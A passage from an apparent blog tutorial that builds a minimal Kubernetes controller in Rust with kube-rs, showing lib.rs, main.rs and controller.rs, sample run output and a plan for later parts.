</p> <div class="highlight js-code-highlight"> <pre class="highlight rust"><code><span class="c1">// lib.rs</span> <span class="k">use</span> <span class="nn">kube</span><span class="p">::</span><span class="n">Client</span><span class="p">;</span> <span class="k">use</span> <span class="nn">thiserror</span><span class="p">::</span><span class="n">Error</span><span class="p">;</span> <span class="k">pub</span> <span class="k">mod</span> <span class="n">controller</span><span class="p">;</span> <span class="c1">// This macro makes our structure "clonable"</span> <span class="nd">#[derive(Clone)]</span> <span class="k">pub</span> <span class="k">struct</span> <span class="n">Context</span> <span class="p">{</span> <span class="k">pub</span> <span class="n">client</span><span class="p">:</span> <span class="n">Client</span><span class="p">,</span> <span class="p">}</span> <span class="nd">#[derive(Error,</span> <span class="nd">Debug)]</span> <span class="k">pub</span> <span class="k">enum</span> <span class="n">Error</span> <span class="p">{</span> <span class="nd">#[error(</span><span class="s">"kube error: {0}"</span><span class="nd">)]</span> <span class="nf">KubeError</span><span class="p">(</span><span class="nd">#[source]</span> <span class="nn">kube</span><span class="p">::</span><span class="n">Error</span><span class="p">),</span> <span class="nd">#[error(</span><span class="s">"invalid configuration: `{0}`"</span><span class="nd">)]</span> <span class="nf">InvalidConfigError</span><span class="p">(</span><span class="nb">String</span><span class="p">),</span> <span class="nd">#[error(</span><span class="s">"Bad service to reconcile: `{0}`"</span><span class="nd">)]</span> <span class="nf">BadService</span><span class="p">(</span><span class="nb">String</span><span class="p">),</span> <span class="nd">#[error(</span><span class="s">"service listing error: {0}"</span><span class="nd">)]</span> <span class="nf">ServiceError</span><span class="p">(</span><span class="nd">#[source]</span> <span class="nn">kube</span><span class="p">::</span><span class="n">Error</span><span class="p">),</span> <span class="p">}</span> <span class="c1">// Result type should be used during reconciliation return</span> <span class="k">pub</span> <span class="k">type</span> <span class="nb">Result</span><span class="o">&lt;</span><span class="n">T</span><span class="p">,</span> <span class="n">E</span> <span class="o">=</span> <span class="n">Error</span><span class="o">&gt;</span> <span class="o">=</span> <span class="nn">std</span><span class="p">::</span><span class="nn">result</span><span class="p">::</span><span class="nb">Result</span><span class="o">&lt;</span><span class="n">T</span><span class="p">,</span> <span class="n">E</span><span class="o">&gt;</span><span class="p">;</span> <span class="c1">// --------------------------- </span> <span class="c1">// main.rs</span> <span class="k">use</span> <span class="nn">kube</span><span class="p">::</span><span class="n">Client</span><span class="p">;</span> <span class="k">use</span> <span class="nn">my_rust_controller</span><span class="p">::</span><span class="n">Context</span><span class="p">;</span> <span class="k">use</span> <span class="nn">my_rust_controller</span><span class="p">::</span><span class="n">controller</span><span class="p">;</span> <span class="nd">#[tokio::main]</span> <span class="k">async</span> <span class="k">fn</span> <span class="nf">main</span><span class="p">()</span> <span class="k">-&gt;</span> <span class="nn">anyhow</span><span class="p">::</span><span class="nb">Result</span><span class="o">&lt;</span><span class="p">()</span><span class="o">&gt;</span> <span class="p">{</span> <span class="nf">run</span><span class="p">()</span><span class="k">.await</span><span class="p">;</span> <span class="nf">Ok</span><span class="p">(())</span> <span class="p">}</span> <span class="k">pub</span> <span class="k">async</span> <span class="k">fn</span> <span class="nf">run</span><span class="p">()</span> <span class="p">{</span> <span class="k">let</span> <span class="n">client</span> <span class="o">=</span> <span class="nn">Client</span><span class="p">::</span><span class="nf">try_default</span><span class="p">()</span> <span class="k">.await</span> <span class="nf">.expect</span><span class="p">(</span><span class="s">"error getting a Kubernetes client"</span><span class="p">);</span> <span class="k">let</span> <span class="n">ctx</span> <span class="o">=</span> <span class="n">Context</span> <span class="p">{</span> <span class="n">client</span><span class="p">:</span> <span class="n">client</span><span class="nf">.clone</span><span class="p">(),</span> <span class="p">};</span> <span class="k">if</span> <span class="k">let</span> <span class="nf">Err</span><span class="p">(</span><span class="n">error</span><span class="p">)</span> <span class="o">=</span> <span class="nn">controller</span><span class="p">::</span><span class="nf">controller</span><span class="p">(</span><span class="n">ctx</span><span class="p">)</span><span class="k">.await</span> <span class="p">{</span> <span class="nd">println!</span><span class="p">(</span><span class="s">"failed to start Service controller: {error:?}"</span><span class="p">);</span> <span class="nn">std</span><span class="p">::</span><span class="nn">process</span><span class="p">::</span><span class="nf">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span> <span class="p">}</span> <span class="p">}</span> </code></pre> </div> <p>Ok, now let's write our controller. The controller will mostly watch for "services" and print messages. In case the service name is "bad-service" and namespace is "default" it will return an error:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight rust"><code><span class="c1">// controller.rs</span> <span class="k">use</span> <span class="nn">futures</span><span class="p">::</span><span class="n">StreamExt</span><span class="p">;</span> <span class="k">use</span> <span class="nn">k8s_openapi</span><span class="p">::</span><span class="nn">api</span><span class="p">::</span><span class="nn">core</span><span class="p">::</span><span class="nn">v1</span><span class="p">::</span><span class="n">Service</span><span class="p">;</span> <span class="k">use</span> <span class="nn">kube</span><span class="p">::{</span> <span class="nn">api</span><span class="p">::{</span><span class="n">Api</span><span class="p">,</span> <span class="n">ListParams</span><span class="p">},</span> <span class="nn">runtime</span><span class="p">::{</span><span class="n">Controller</span><span class="p">,</span> <span class="nn">controller</span><span class="p">::</span><span class="n">Action</span><span class="p">,</span> <span class="nn">watcher</span><span class="p">::</span><span class="n">Config</span><span class="p">},</span> <span class="p">};</span> <span class="k">use</span> <span class="nn">std</span><span class="p">::{</span><span class="nn">sync</span><span class="p">::</span><span class="nb">Arc</span><span class="p">,</span> <span class="nn">time</span><span class="p">::</span><span class="n">Duration</span><span class="p">};</span> <span class="k">use</span> <span class="k">crate</span><span class="p">::</span><span class="o">*</span><span class="p">;</span> <span class="k">pub</span> <span class="k">async</span> <span class="k">fn</span> <span class="nf">controller</span><span class="p">(</span><span class="n">ctx</span><span class="p">:</span> <span class="n">Context</span><span class="p">)</span> <span class="k">-&gt;</span> <span class="nb">Result</span><span class="o">&lt;</span><span class="p">()</span><span class="o">&gt;</span> <span class="p">{</span> <span class="k">let</span> <span class="n">service</span> <span class="o">=</span> <span class="nn">Api</span><span class="p">::</span><span class="o">&lt;</span><span class="n">Service</span><span class="o">&gt;</span><span class="p">::</span><span class="nf">all</span><span class="p">(</span><span class="n">ctx</span><span class="py">.client</span><span class="nf">.clone</span><span class="p">());</span> <span class="n">service</span> <span class="nf">.list</span><span class="p">(</span><span class="o">&amp;</span><span class="nn">ListParams</span><span class="p">::</span><span class="nf">default</span><span class="p">()</span><span class="nf">.limit</span><span class="p">(</span><span class="mi">1</span><span class="p">))</span> <span class="k">.await</span> <span class="nf">.map_err</span><span class="p">(</span><span class="nn">Error</span><span class="p">::</span><span class="n">ServiceError</span><span class="p">)</span><span class="o">?</span><span class="p">;</span> <span class="nn">Controller</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span><span class="n">service</span><span class="p">,</span> <span class="nn">Config</span><span class="p">::</span><span class="nf">default</span><span class="p">()</span><span class="nf">.any_semantic</span><span class="p">())</span> <span class="nf">.shutdown_on_signal</span><span class="p">()</span> <span class="nf">.run</span><span class="p">(</span><span class="n">reconcile</span><span class="p">,</span> <span class="n">error_policy</span><span class="p">,</span> <span class="nn">Arc</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span><span class="n">ctx</span><span class="p">))</span> <span class="nf">.filter_map</span><span class="p">(|</span><span class="n">x</span><span class="p">|</span> <span class="k">async</span> <span class="k">move</span> <span class="p">{</span> <span class="nn">std</span><span class="p">::</span><span class="nn">result</span><span class="p">::</span><span class="nn">Result</span><span class="p">::</span><span class="nf">ok</span><span class="p">(</span><span class="n">x</span><span class="p">)</span> <span class="p">})</span> <span class="nf">.for_each</span><span class="p">(|</span><span class="n">_</span><span class="p">|</span> <span class="nn">futures</span><span class="p">::</span><span class="nn">future</span><span class="p">::</span><span class="nf">ready</span><span class="p">(()))</span> <span class="k">.await</span><span class="p">;</span> <span class="nf">Ok</span><span class="p">(())</span> <span class="p">}</span> <span class="k">pub</span> <span class="k">async</span> <span class="k">fn</span> <span class="nf">reconcile</span><span class="p">(</span><span class="n">service</span><span class="p">:</span> <span class="nb">Arc</span><span class="o">&lt;</span><span class="n">Service</span><span class="o">&gt;</span><span class="p">,</span> <span class="n">_</span><span class="p">:</span> <span class="nb">Arc</span><span class="o">&lt;</span><span class="n">Context</span><span class="o">&gt;</span><span class="p">)</span> <span class="k">-&gt;</span> <span class="nb">Result</span><span class="o">&lt;</span><span class="n">Action</span><span class="o">&gt;</span> <span class="p">{</span> <span class="k">let</span> <span class="n">name</span> <span class="o">=</span> <span class="n">service</span> <span class="py">.metadata</span> <span class="py">.name</span> <span class="nf">.clone</span><span class="p">()</span> <span class="nf">.ok_or</span><span class="p">(</span><span class="nn">Error</span><span class="p">::</span><span class="nf">InvalidConfigError</span><span class="p">(</span><span class="s">"invalid name"</span><span class="nf">.to_string</span><span class="p">()))</span><span class="o">?</span><span class="p">;</span> <span class="k">let</span> <span class="n">ns</span> <span class="o">=</span> <span class="n">service</span> <span class="py">.metadata</span> <span class="py">.namespace</span> <span class="nf">.clone</span><span class="p">()</span> <span class="nf">.ok_or</span><span class="p">(</span><span class="nn">Error</span><span class="p">::</span><span class="nf">InvalidConfigError</span><span class="p">(</span><span class="s">"invalid namespace"</span><span class="nf">.to_string</span><span class="p">()))</span><span class="o">?</span><span class="p">;</span> <span class="nd">println!</span><span class="p">(</span><span class="s">"reconciling service {ns}/{name}"</span><span class="p">);</span> <span class="k">if</span> <span class="n">name</span> <span class="o">==</span> <span class="s">"bad-service"</span> <span class="o">&amp;&amp;</span> <span class="n">ns</span> <span class="o">==</span> <span class="s">"default"</span> <span class="p">{</span> <span class="k">return</span> <span class="nf">Err</span><span class="p">(</span><span class="nn">Error</span><span class="p">::</span><span class="nf">BadService</span><span class="p">(</span><span class="s">"Service has a bad name"</span><span class="nf">.to_string</span><span class="p">()));</span> <span class="p">}</span> <span class="nf">Ok</span><span class="p">(</span><span class="nn">Action</span><span class="p">::</span><span class="nf">requeue</span><span class="p">(</span><span class="nn">Duration</span><span class="p">::</span><span class="nf">from_secs</span><span class="p">(</span><span class="mi">60</span><span class="p">)))</span> <span class="p">}</span> <span class="c1">// error_policy is the function called when a reconciliation error happens</span> <span class="k">fn</span> <span class="nf">error_policy</span><span class="p">(</span><span class="n">_</span><span class="p">:</span> <span class="nb">Arc</span><span class="o">&lt;</span><span class="n">Service</span><span class="o">&gt;</span><span class="p">,</span> <span class="n">error</span><span class="p">:</span> <span class="o">&amp;</span><span class="n">Error</span><span class="p">,</span> <span class="n">_</span><span class="p">:</span> <span class="nb">Arc</span><span class="o">&lt;</span><span class="n">Context</span><span class="o">&gt;</span><span class="p">)</span> <span class="k">-&gt;</span> <span class="n">Action</span> <span class="p">{</span> <span class="nd">println!</span><span class="p">(</span> <span class="s">"error happened during reconciliation of service svc {:?}"</span><span class="p">,</span> <span class="n">error</span> <span class="p">);</span> <span class="nn">Action</span><span class="p">::</span><span class="nf">requeue</span><span class="p">(</span><span class="nn">Duration</span><span class="p">::</span><span class="nf">from_secs</span><span class="p">(</span><span class="mi">5</span> <span class="o">*</span> <span class="mi">60</span><span class="p">))</span> <span class="c1">// Requeue after 5 minutes</span> <span class="p">}</span> </code></pre> </div> <p>Running this program, we will get the following outputs:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>$ kubectl create service clusterip bad-service --tcp=80 ..... $ cargo run reconciling service kube-system/kube-dns reconciling service default/nginx reconciling service default/kubernetes reconciling service default/bad-service error happened during reconciliation of service svc BadService("Service has a bad name") </code></pre> </div> <h2> Conclusion (part 1) </h2> <p>Here we explored a very simple controller. It doesn't do anything useful other than printing messages. It doesn't even gets the object to check labels, or adds finalizer.</p> <p>On the next parts, we will:</p> <ul> <li>Given a label, patch the service</li> <li>Add finalizers</li> <li>Add some better logging</li> </ul> <h2> References: </h2> <ul> <li>kube-rs controller example: <a href="https://github.com/kube-rs/controller-rs/blob/main/src/lib.rs" rel="noopener noreferrer">https://github.com/kube-rs/controller-rs/blob/main/src/lib.rs</a> </li> <li>Kubernetes Blixt: <a href="https://github.com/kubernetes-sigs/blixt" rel="noopener noreferrer">https://github.com/kubernetes-sigs/blixt</a> </li> </ul> kubernetes rust programming